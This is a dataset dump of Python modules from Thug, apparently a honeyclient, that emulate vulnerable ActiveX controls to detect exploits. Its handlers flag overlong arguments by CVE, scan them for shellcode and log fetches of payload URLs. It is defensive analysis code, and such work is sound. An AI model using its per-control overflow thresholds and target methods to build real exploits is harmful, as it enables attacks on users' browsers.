id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13,000
|
StormConfig.py
|
buffer_thug/thug/ActiveX/modules/StormConfig.py
|
# BaoFeng Storm ActiveX Control SetAttributeValue() Buffer Overflow Vulnerability
# CVE-2009-1807
import logging
log = logging.getLogger("Thug")
def SetAttributeValue(self, arg0, arg1, arg2):  # pylint:disable=unused-argument
    """Emulate SetAttributeValue() and flag CVE-2009-1807 overflow attempts.

    A first argument longer than 260 characters is logged as an exploit and
    scanned for shellcode; arg1/arg2 are accepted for signature fidelity only.
    """
    if len(arg0) <= 260:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "BaoFeng Storm ActiveX Control",
        "SetAttributeValue Buffer Overflow",
        cve="CVE-2009-1807",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2009-1807")
    log.ThugLogging.Shellcode.check_shellcode(arg0)
| 609
|
Python
|
.py
| 14
| 36.142857
| 87
| 0.691525
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,001
|
SSReaderPdg2.py
|
buffer_thug/thug/ActiveX/modules/SSReaderPdg2.py
|
# SSReader Pdg2 ActiveX control (pdg2.dll)
# CVE-2007-5892
import logging
log = logging.getLogger("Thug")
def Register(self, arg0, arg1):  # pylint:disable=unused-argument
    """Emulate Register() and flag the CVE-2007-5892 overflow in arg1 (>255)."""
    if len(arg1) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "SSReader Pdg2 ActiveX",
        "Register Method Overflow",
        cve="CVE-2007-5892",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5892")
    log.ThugLogging.Shellcode.check_shellcode(arg1)
def LoadPage(self, arg0, arg1, arg2, arg3):  # pylint:disable=unused-argument
    """Emulate LoadPage() and flag the CVE-2007-5892 overflow in arg0 (>255)."""
    if len(arg0) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "SSReader Pdg2 ActiveX",
        "LoadPage Method Overflow",
        cve="CVE-2007-5892",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5892")
    log.ThugLogging.Shellcode.check_shellcode(arg0)
| 980
|
Python
|
.py
| 24
| 32.5
| 87
| 0.64557
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,002
|
SnapshotViewer.py
|
buffer_thug/thug/ActiveX/modules/SnapshotViewer.py
|
# Microsoft Access Snapshot Viewer
# CVE-2008-2463
import logging
log = logging.getLogger("Thug")
def PrintSnapshot(self, SnapshotPath="", CompressedPath=""):
    """Emulate PrintSnapshot() (CVE-2008-2463) and fetch the snapshot URL.

    Non-empty arguments overwrite the corresponding instance properties.
    NOTE(review): when the arguments are empty this assumes self.SnapshotPath /
    self.CompressedPath already exist — confirm against the control's setup.
    """
    if SnapshotPath:
        self.SnapshotPath = SnapshotPath
    if CompressedPath:
        self.CompressedPath = CompressedPath
    msg = f"[Microsoft Access Snapshot Viewer ActiveX] SnapshotPath : {self.SnapshotPath}, CompressedPath: {self.CompressedPath}"
    log.ThugLogging.add_behavior_warn(msg, "CVE-2008-2463")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Microsoft Access Snapshot Viewer ActiveX",
        "Print Snapshot",
        forward=False,
        cve="CVE-2008-2463",
        data={"SnapshotPath": self.SnapshotPath, "CompressedPath": self.CompressedPath},
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2008-2463")
    # The SnapshotPath doubles as the download URL for the exploit payload.
    try:
        self._window._navigator.fetch(self.SnapshotPath, redirect_type="CVE-2008-2463")
    except Exception:  # pragma: no cover,pylint:disable=broad-except
        log.ThugLogging.add_behavior_warn(
            "[Microsoft Access Snapshot Viewer ActiveX] Fetch failed"
        )
| 1,165
|
Python
|
.py
| 27
| 36.666667
| 129
| 0.706195
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,003
|
QvodCtrl.py
|
buffer_thug/thug/ActiveX/modules/QvodCtrl.py
|
# Qvod Player QvodCtrl Class ActiveX Control
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetURL(self, val):
    """Store the URL property (both spellings) and flag overflows (>800 chars)."""
    self.__dict__["URL"] = val
    self.__dict__["url"] = val
    if len(val) <= 800:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Qvod Player QvodCtrl Class ActiveX",
        "Overflow in URL property",
    )
    log.ThugLogging.Shellcode.check_shellcode(val)
| 447
|
Python
|
.py
| 14
| 25.428571
| 54
| 0.633178
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,004
|
WindowsMediaPlayer.py
|
buffer_thug/thug/ActiveX/modules/WindowsMediaPlayer.py
|
import logging
log = logging.getLogger("Thug")
def Play(self):  # pylint:disable=unused-argument
    """Emulate the Windows Media Player Play() method; only records the call."""
    log.warning("[WindowsMediaPlayer] Play")
| 145
|
Python
|
.py
| 4
| 33.5
| 49
| 0.768116
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,005
|
RDSDataSpace.py
|
buffer_thug/thug/ActiveX/modules/RDSDataSpace.py
|
# Microsoft MDAC RDS.Dataspace ActiveX
# CVE-2006-0003
import logging
log = logging.getLogger("Thug")
def CreateObject(self, _object, param=""):  # pylint:disable=unused-argument
    """Emulate RDS.Dataspace CreateObject() (CVE-2006-0003).

    Logs the exploit event and returns a fresh ActiveX wrapper for the
    requested ProgID; `param` is accepted for signature fidelity only.
    """
    # NOTE(review): local import — presumably avoids a circular dependency
    # between this module and thug.ActiveX; confirm before hoisting.
    from thug import ActiveX

    log.ThugLogging.add_behavior_warn(
        f"[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject ({_object})"
    )
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Microsoft MDAC RDS.Dataspace ActiveX",
        "CreateObject",
        cve="CVE-2006-0003",
        forward=False,
        data={"object": _object},
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2006-0003")
    return ActiveX.ActiveX._ActiveXObject(self._window, _object)
| 712
|
Python
|
.py
| 19
| 31.736842
| 83
| 0.692868
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,006
|
NeoTracePro.py
|
buffer_thug/thug/ActiveX/modules/NeoTracePro.py
|
# NeoTraceExplorer.NeoTraceLoader ActiveX control (NeoTraceExplorer.dll)
# CVE-2006-6707
import logging
log = logging.getLogger("Thug")
def TraceTarget(self, target):
    """Flag CVE-2006-6707: NeoTraceLoader TraceTarget() overflow (>255 chars)."""
    if len(target) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "NeoTraceExplorer.NeoTraceLoader ActiveX",
        "Overflow in arg0",
        cve="CVE-2006-6707",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2006-6707")
    log.ThugLogging.Shellcode.check_shellcode(target)
| 547
|
Python
|
.py
| 14
| 31.714286
| 87
| 0.681818
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,007
|
FacebookPhotoUploader.py
|
buffer_thug/thug/ActiveX/modules/FacebookPhotoUploader.py
|
# Facebook Photo Uploader 4.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetExtractIptc(self, val):
    """Store the ExtractIptc property; oversized values (>255) are flagged."""
    self.__dict__["ExtractIptc"] = val
    if len(val) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "FaceBook Photo Uploader ActiveX",
        "Overflow in ExtractIptc property",
    )
    log.ThugLogging.Shellcode.check_shellcode(val)
def SetExtractExif(self, val):
    """Store the ExtractExif property; oversized values (>255) are flagged."""
    self.__dict__["ExtractExif"] = val
    if len(val) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "FaceBook Photo Uploader ActiveX",
        "Overflow in ExtractExif property",
    )
    log.ThugLogging.Shellcode.check_shellcode(val)
| 751
|
Python
|
.py
| 22
| 26.590909
| 54
| 0.63939
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,008
|
ConnectAndEnterRoom.py
|
buffer_thug/thug/ActiveX/modules/ConnectAndEnterRoom.py
|
# GlobalLink ConnectAndEnterRoom ActiveX Control ConnectAndEnterRoom() Method Overflow Vulnerability
# CVE-2007-5722
import logging
log = logging.getLogger("Thug")
def ConnectAndEnterRoom(self, arg0, arg1, arg2, arg3, arg4, arg5):  # pylint:disable=unused-argument
    """Flag the CVE-2007-5722 ConnectAndEnterRoom() overflow in arg0 (>172)."""
    if len(arg0) <= 172:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "GlobalLink ConnectAndEnterRoom ActiveX",
        "ConnectAndEnterRoom Overflow",
        cve="CVE-2007-5722",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5722")
    log.ThugLogging.Shellcode.check_shellcode(arg0)
| 652
|
Python
|
.py
| 14
| 39.214286
| 100
| 0.706161
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,009
|
ICQToolbar.py
|
buffer_thug/thug/ActiveX/modules/ICQToolbar.py
|
# ICQ Toolbar attack
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def GetPropertyById(self, arg0, arg1):  # pylint:disable=unused-argument
    """Flag the ICQ Toolbar GetPropertyById() overflow in arg1 (>120 chars)."""
    if len(arg1) <= 120:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "ICQ Toolbar ActiveX",
        "Buffer overflow in GetPropertyById",
    )
    log.ThugLogging.Shellcode.check_shellcode(arg1)
| 407
|
Python
|
.py
| 12
| 27.25
| 72
| 0.670077
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,010
|
WMP.py
|
buffer_thug/thug/ActiveX/modules/WMP.py
|
import logging
log = logging.getLogger("Thug")
def openPlayer(self, arg):  # pylint:disable=unused-argument
    """Emulate WMP openPlayer(); the supplied argument is only logged."""
    log.warning(arg)
| 132
|
Python
|
.py
| 4
| 30.25
| 60
| 0.768
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,011
|
UUSeeUpdate.py
|
buffer_thug/thug/ActiveX/modules/UUSeeUpdate.py
|
# UUSee UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability
# CVE...
import logging
log = logging.getLogger("Thug")
def Update(self, *args):  # pylint:disable=unused-argument
    """Emulate UUUpgrade Update(); any invocation is reported as an attack."""
    log.ThugLogging.log_exploit_event(
        self._window.url, "UUsee UUPgrade ActiveX", "Attack in Update Method"
    )
| 330
|
Python
|
.py
| 8
| 37.75
| 87
| 0.751572
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,012
|
Shockwave.py
|
buffer_thug/thug/ActiveX/modules/Shockwave.py
|
import logging
log = logging.getLogger("Thug")
def ShockwaveVersion(self, arg):
    """Flag the ShockwaveVersion stack overflow for very large arguments (>= 768*768)."""
    if len(arg) < 768 * 768:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url, "Shockwave", "ShockwaveVersion Stack Overflow"
    )
    log.ThugLogging.Shellcode.check_shellcode(arg)
| 298
|
Python
|
.py
| 8
| 30.875
| 76
| 0.682927
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,013
|
MicrosoftWorks7Attack.py
|
buffer_thug/thug/ActiveX/modules/MicrosoftWorks7Attack.py
|
import logging
log = logging.getLogger("Thug")
def SetWksPictureInterface(self, val):
    """Store the WksPictureInterface property; every assignment is reported
    as an exploit attempt (no size threshold is applied)."""
    self.__dict__["WksPictureInterface"] = val
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "MicrosoftWorks7 ActiveX",
        "Overflow in WksPictureInterface property",
    )
| 295
|
Python
|
.py
| 9
| 27.333333
| 51
| 0.705674
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,014
|
DVRHOSTWeb.py
|
buffer_thug/thug/ActiveX/modules/DVRHOSTWeb.py
|
# DVRHOST Web CMS OCX 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def TimeSpanFormat(self, arg0, arg1):  # pylint:disable=unused-argument
    """Flag the DVRHOST Web CMS TimeSpanFormat() overflow in arg1 (>512)."""
    if len(arg1) <= 512:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "DVRHOST Web CMS OCX ActiveX",
        "Overflow in TimeSpanFormat",
    )
    log.ThugLogging.Shellcode.check_shellcode(arg1)
| 411
|
Python
|
.py
| 12
| 27.583333
| 71
| 0.663291
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,015
|
AdodbStream.py
|
buffer_thug/thug/ActiveX/modules/AdodbStream.py
|
from io import BytesIO
import logging
log = logging.getLogger("Thug")
def getSize(self):
    """Return the number of characters/bytes buffered in the stream (0 if unopened).

    FIX: the original fetched `fobject` defensively with getattr and then
    dereferenced `self.fobject` anyway, defeating the guard; the local is
    now used consistently.
    """
    fobject = getattr(self, "fobject", None)
    content = fobject.getvalue() if fobject else str()
    return len(content)
def open(self):  # pylint:disable=redefined-builtin
    """Emulate Adodb.Stream open(): log the call and allocate a fresh in-memory buffer."""
    log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] open")
    self.fobject = BytesIO()
def Read(self, length=-1):
    """Return up to `length` characters from the current position.

    A non-positive `length` returns everything from the current position to
    the end of the buffer.

    BUGFIX: the slice end must be relative to the current position —
    previously ``content[self.position:length]`` truncated or dropped data
    whenever ``self.position > 0``.
    """
    log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Read")
    fobject = getattr(self, "fobject", None)
    content = fobject.getvalue() if fobject else str()
    if length <= 0:
        return content[self.position :]
    end = min(self.position + length, len(content))
    return content[self.position : end]
def Write(self, s):
    """Append the encoded form of `s` to the stream buffer."""
    log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Write")
    self.fobject.write(s.encode())
def SaveToFile(self, filename, opt=0):
    """Emulate SaveToFile(): log the dropped file and record its content.

    The buffered bytes are MIME-typed, handed to the sample logger, and
    cached in ``self._files`` under `filename` for later LoadFromFile calls.
    """
    log.ThugLogging.add_behavior_warn(
        f"[Adodb.Stream ActiveX] SaveToFile((unknown), {opt})"
    )
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Adodb.Stream ActiveX",
        "SaveToFile",
        data={"file": filename},
        forward=False,
    )
    content = self.fobject.getvalue()
    log.ThugLogging.log_file(content, url=filename, sampletype=log.Magic.get_mime(content))
    self._files[filename] = content
def LoadFromFile(self, filename):
    """Emulate LoadFromFile(): make a previously saved file the current one.

    Raises TypeError when `filename` was never stored via SaveToFile.
    """
    log.ThugLogging.add_behavior_warn(
        "[Adodb.Stream ActiveX] LoadFromFile((unknown))"
    )
    if filename not in self._files:
        raise TypeError()
    self._current = filename
def ReadText(self, NumChars=-1):
    """Return `NumChars` characters of the current file from `position`
    (everything remaining when NumChars is -1)."""
    log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] ReadText")
    data = self._files[self._current]
    if NumChars == -1:
        return data[self.position :]
    return data[self.position : self.position + NumChars]
def WriteText(self, data, options=None):  # pylint:disable=unused-argument
    """Append the encoded `data` to the stream buffer; `options` is ignored."""
    log.ThugLogging.add_behavior_warn(f"[Adodb.Stream ActiveX] WriteText({data})")
    self.fobject.write(data.encode())
def Close(self):
    """Emulate Close(): release the in-memory buffer."""
    log.ThugLogging.add_behavior_warn("[Adodb.Stream ActiveX] Close")
    self.fobject.close()
def setPosition(self, pos):
    """Move both the logical `position` attribute and the buffer cursor to `pos`."""
    log.ThugLogging.add_behavior_warn(
        f"[Adodb.Stream ActiveX] Changed position in fileobject to: ({pos})"
    )
    self.__dict__["position"] = pos
    self.fobject.seek(pos)
| 2,404
|
Python
|
.py
| 59
| 35.372881
| 86
| 0.69892
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,016
|
MacrovisionFlexNet.py
|
buffer_thug/thug/ActiveX/modules/MacrovisionFlexNet.py
|
# MacrovisionJob, MacrovisionFlexNet
# CVE-2007-2419, CVE-2007-5660, CVE-2007-6654, CVE-2007-0321, CVE-2007-0328
import logging
log = logging.getLogger("Thug")
def Initialize(self, *args):  # pylint:disable=unused-argument
    """Emulate Macrovision Initialize(); arguments are ignored, the call is logged."""
    log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Initialize")
def CreateJob(self, name, arg, job_id):
    """Emulate CreateJob(): log the request and return self as the job object."""
    log.ThugLogging.add_behavior_warn(
        f'[Macrovision ActiveX] CreateJob("{name}", "{arg}", "{job_id}")'
    )
    return self
def DownloadAndExecute(self, arg0, arg1, arg2, arg3, arg4):
    """Emulate DownloadAndExecute(): log the call, detect the CVE-2007-2419 /
    CVE-2007-6654 overflow in arg1 (>512 chars), then fetch the payload URL
    carried in arg3.
    """
    log.ThugLogging.add_behavior_warn(
        f"[Macrovision ActiveX] DownloadAndExecute("
        f'"{arg0}", "{arg1}", "{arg2}", "{arg3}", "{arg4}")'
    )
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Macrovision ActiveX",
        "DownloadAndExecute",
        data={"arg": arg0, "arg1": arg1, "arg2": arg2, "arg3": arg3, "arg4": arg4},
        forward=False,
    )
    if len(arg1) > 512:
        log.ThugLogging.log_exploit_event(
            self._window.url,
            "Macrovision ActiveX",
            "DownloadAndExecute overflow",
            cve="CVE-2007-2419, CVE-2007-6654",
        )
        log.ThugLogging.Shellcode.check_shellcode(arg1)
        log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
        log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6654")
    log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg3}")
    try:
        self._window._navigator.fetch(arg3, redirect_type="Macrovision Exploit")
    except Exception:  # pylint:disable=broad-except
        log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Fetch failed")
def DownloadAndInstall(self, *args):  # pylint:disable=unused-argument
    """Emulate DownloadAndInstall(); arguments are ignored, the call is logged."""
    log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] DownloadAndInstall")
def AddFileEx(self, arg0, arg1, arg2, arg3, arg4, arg5, arg6):  # pylint:disable=unused-argument
    """Flag the CVE-2007-2419 AddFileEx() overflow in arg2 (>512 chars)."""
    if len(arg2) <= 512:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Macrovision ActiveX",
        "AddFileEx overflow",
        cve="CVE-2007-2419",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
    log.ThugLogging.Shellcode.check_shellcode(arg2)
def AddFile(self, arg0, arg1):
    """Emulate AddFile() (CVE-2007-2419): log the call and fetch arg0 as a URL."""
    log.ThugLogging.add_behavior_warn(
        f'[Macrovision ActiveX] AddFile("{arg0}", "{arg1}")'
    )
    log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] Fetching from URL {arg0}")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Macrovision ActiveX",
        "AddFile/Fetch from URL",
        cve="CVE-2007-2419",
        forward=False,
        data={"url": arg0, "arg1": arg1},
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-2419")
    try:
        self._window._navigator.fetch(arg0, redirect_type="Macrovision Exploit 2")
    except Exception:  # pylint:disable=broad-except
        log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] Fetch failed")
def SetPriority(self, priority):  # pylint:disable=unused-argument
    """Emulate SetPriority(); the requested priority is only logged."""
    log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] SetPriority({priority})")
def SetNotifyFlags(self, flags):  # pylint:disable=unused-argument
    """Emulate SetNotifyFlags(); the requested flags are only logged."""
    log.ThugLogging.add_behavior_warn(f"[Macrovision ActiveX] SetNotifyFlags({flags})")
def RunScheduledJobs(self):  # pylint:disable=unused-argument
    """Emulate RunScheduledJobs(); the call is only logged."""
    log.ThugLogging.add_behavior_warn("[Macrovision ActiveX] RunScheduledJobs()")
| 3,549
|
Python
|
.py
| 74
| 41.013514
| 96
| 0.684943
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,017
|
TextStream.py
|
buffer_thug/thug/ActiveX/modules/TextStream.py
|
import os
import hashlib
import string
import random
import errno
import logging
log = logging.getLogger("Thug")
class TextStream:
    """In-memory emulation of a Scripting.FileSystemObject TextStream.

    The buffer is kept as a list of lines (``self.stream``, no trailing
    newlines).  Two cursors are tracked, both 1-based: the write cursor
    (``_Line``/``_Column``, always at the end of the buffer) and the read
    cursor (``_currentLine``/``_currentColumn``).
    """

    def __init__(self):
        self.stream = []  # buffered text, one list entry per line
        self._Line = 1  # write cursor: 1-based line index
        self._Column = 1  # write cursor: 1-based column index
        self._currentLine = 1  # read cursor: 1-based line index
        self._currentColumn = 1  # read cursor: 1-based column index
        self._filename = ""  # target filename, set by the FSO wrapper

    @property
    def Line(self):
        """Current write line number (1-based)."""
        return self._Line

    @property
    def Column(self):
        """Current write column number (1-based)."""
        return self._Column

    @property
    def AtEndOfLine(self):
        """True when the read cursor sits at (or past) the end of its line."""
        line = self.stream[self._currentLine - 1]
        return self._currentColumn >= len(line)

    @property
    def AtEndOfStream(self):
        """True when the read cursor has caught up with the write cursor.

        NOTE(review): the read column must equal exactly ``_Column - 1``;
        a cursor that moved past that point is not reported as end-of-stream
        — confirm this is the intended contract.
        """
        if self._currentLine in (self._Line,) and self._currentColumn in (
            self._Column - 1,
        ):
            return True
        return False

    def Read(self, characters):
        """Read up to ``characters`` characters from the read cursor.

        Line breaks consume one character each; the cursor is advanced past
        everything returned.
        """
        consume = characters  # characters still to deliver
        result = ""
        while consume > 0:
            # Stop once the read cursor moves past the last written line ...
            if self._currentLine > self._Line:
                break
            # ... or past the write column on that last line.
            if (
                self._currentLine == self._Line and self._currentColumn > self._Column
            ):  # pragma: no cover
                break
            line = self.stream[self._currentLine - 1]
            eline = line[self._currentColumn - 1 :]  # unread tail of current line
            length = min(len(eline), consume)
            result += eline[:length]
            consume -= length
            if consume > 0:  # pragma: no cover
                # Request spans lines: emit the line break (counts as one
                # character) and move to the start of the next line.
                result += "\n"
                consume -= 1
                self._currentLine += 1
                self._currentColumn = 1
            else:
                self._currentColumn += length
        return result

    def ReadLine(self):
        """Return the read cursor's line and advance to the next line."""
        if self._currentLine > self._Line:
            return ""
        result = self.stream[self._currentLine - 1]
        self._currentLine += 1
        self._currentColumn = 1
        return result

    def ReadAll(self):
        """Return the whole buffer and move the read cursor to its end."""
        result = "\n".join(self.stream)
        self._currentLine = len(self.stream)
        self._currentColumn = len(self.stream[self._currentLine - 1])
        return result

    def Write(self, _string):
        """Append ``_string`` at the write cursor, splitting on newlines."""
        _str_string = str(_string)
        if not _str_string:
            return
        sstring = _str_string.split("\n")
        # Make sure the current write line exists before appending to it.
        if len(self.stream) == self._Line - 1:
            self.stream.append(str())
        self.stream[self._Line - 1] += sstring[0]
        self._Column += len(sstring[0])
        lines_no = len(sstring)
        if lines_no == 1:
            return
        # Each further fragment starts a fresh line in the buffer.
        # NOTE(review): _Column keeps accumulating across the new lines
        # instead of being reset per line — verify this is intended.
        for i in range(1, lines_no):
            self._Line += 1
            self.stream.append(str())
            self.stream[self._Line - 1] = sstring[i]
            self._Column += len(sstring[i])

    def WriteLine(self, _string):
        """Write ``_string`` followed by a newline and reset the write column."""
        self.Write(str(_string) + "\n")
        self._Column = 1

    def WriteBlankLines(self, lines):
        """Write ``lines`` empty lines and reset the write column."""
        self.Write(lines * "\n")
        self._Column = 1

    def Skip(self, characters):
        """Advance the read cursor by ``characters`` characters.

        Skipping past the end of a line consumes the rest of the line plus
        one character for the line break.
        """
        skip = characters
        while skip > 0:
            line = self.stream[self._currentLine - 1]
            eline = line[self._currentColumn - 1 :]  # unread tail of current line
            if skip > len(eline) + 1:  # pragma: no cover
                self._currentLine += 1
                self._currentColumn = 1
            else:
                self._currentColumn += skip
            skip -= len(eline) + 1

    def SkipLine(self):
        """Move the read cursor to the start of the next line."""
        self._currentLine += 1
        self._currentColumn = 1

    def Close(self):
        """Flush the buffer to the analysis logs and (optionally) to disk.

        The joined content is hashed, MIME-typed and handed to the location
        logger and text classifier; when file logging is enabled it is also
        written under <baseDir>/analysis/textstream/<basename>.
        """
        content = "\n".join(self.stream)
        log.info(content)
        _content = content.encode() if isinstance(content, str) else content
        data = {
            "content": content,
            "status": 200,
            "md5": hashlib.md5(_content).hexdigest(),  # nosec
            "sha256": hashlib.sha256(_content).hexdigest(),
            "fsize": len(content),
            "ctype": "textstream",
            "mtype": log.Magic.get_mime(_content),
        }
        log.ThugLogging.log_location(log.ThugLogging.url, data)
        log.TextClassifier.classify(log.ThugLogging.url, content)
        if not log.ThugOpts.file_logging:
            return
        log_dir = os.path.join(log.ThugLogging.baseDir, "analysis", "textstream")
        try:
            os.makedirs(log_dir)
        except OSError as e:  # pragma: no cover
            # An already-existing directory is fine; anything else re-raises.
            if e.errno == errno.EEXIST:
                pass
            else:
                raise
        # Use only the basename when a Windows-style path was recorded.
        filename = (
            self._filename.split("\\")[-1] if "\\" in self._filename else self._filename
        )  # pylint:disable=use-maxsplit-arg
        if not filename:  # pragma: no cover
            filename = "".join(random.choice(string.ascii_lowercase) for i in range(8))
        log_file = os.path.join(log_dir, filename)
        with open(log_file, encoding="utf-8", mode="w") as fd:
            fd.write(content)
| 4,792
|
Python
|
.py
| 137
| 24.744526
| 88
| 0.543167
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,018
|
ScriptingFileSystemObject.py
|
buffer_thug/thug/ActiveX/modules/ScriptingFileSystemObject.py
|
import os
import string
import random
import logging
from thug.ActiveX.modules import WScriptShell
from thug.ActiveX.modules import TextStream
from thug.ActiveX.modules import File
from thug.ActiveX.modules import Folder
from thug.OS.Windows import win32_files
from thug.OS.Windows import win32_folders
log = logging.getLogger("Thug")
def BuildPath(self, arg0, arg1):  # pylint:disable=unused-argument
    """Join a path and a name with a single backslash, Windows-style."""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] BuildPath("{arg0}", "{arg1}")'
    )
    return f"{arg0}\\{arg1}"
def CopyFile(self, source, destination, overwritefiles=False):  # pylint:disable=unused-argument
    """Duplicate an emulated text file under a new name (overwrite flag ignored).

    NOTE: the destination shares the same TextStream object as the source —
    this is a reference copy, not a deep copy.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] CopyFile("{source}", "{destination}")'
    )
    log.TextFiles[destination] = log.TextFiles[source]
def DeleteFile(self, filespec, force=False):  # pylint:disable=unused-argument
    """Log a DeleteFile request; emulation only — nothing is actually removed."""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] DeleteFile("{filespec}", {force})'
    )
def CreateTextFile(self, filename, overwrite=False, _unicode=False):  # pylint:disable=unused-argument
    """Create and return a fresh emulated TextStream bound to `filename`."""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] CreateTextFile("(unknown)", '
        f'"{overwrite}", '
        f'"{_unicode}")'
    )
    stream = TextStream.TextStream()
    stream._filename = filename
    return stream
def CreateFolder(self, path):  # pylint:disable=unused-argument
    """Log the request and return a Folder wrapper for `path`
    (nothing is created on disk)."""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] CreateFolder("{path}")'
    )
    return Folder.Folder(path)
def FileExists(self, filespec):  # pylint:disable=unused-argument
    """Report whether `filespec` exists in the emulated filesystem.

    Empty paths are treated as existing; otherwise the well-known Windows
    file list and any text files created during this session are consulted.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] FileExists("{filespec}")'
    )
    if not filespec:
        return True
    if filespec.lower() in win32_files:
        return True
    return bool(getattr(log, "TextFiles", None) and filespec in log.TextFiles)
def FolderExists(self, folder):  # pylint:disable=unused-argument
    """True when `folder` names one of the emulated well-known Windows folders."""
    log.ThugLogging.add_behavior_warn(
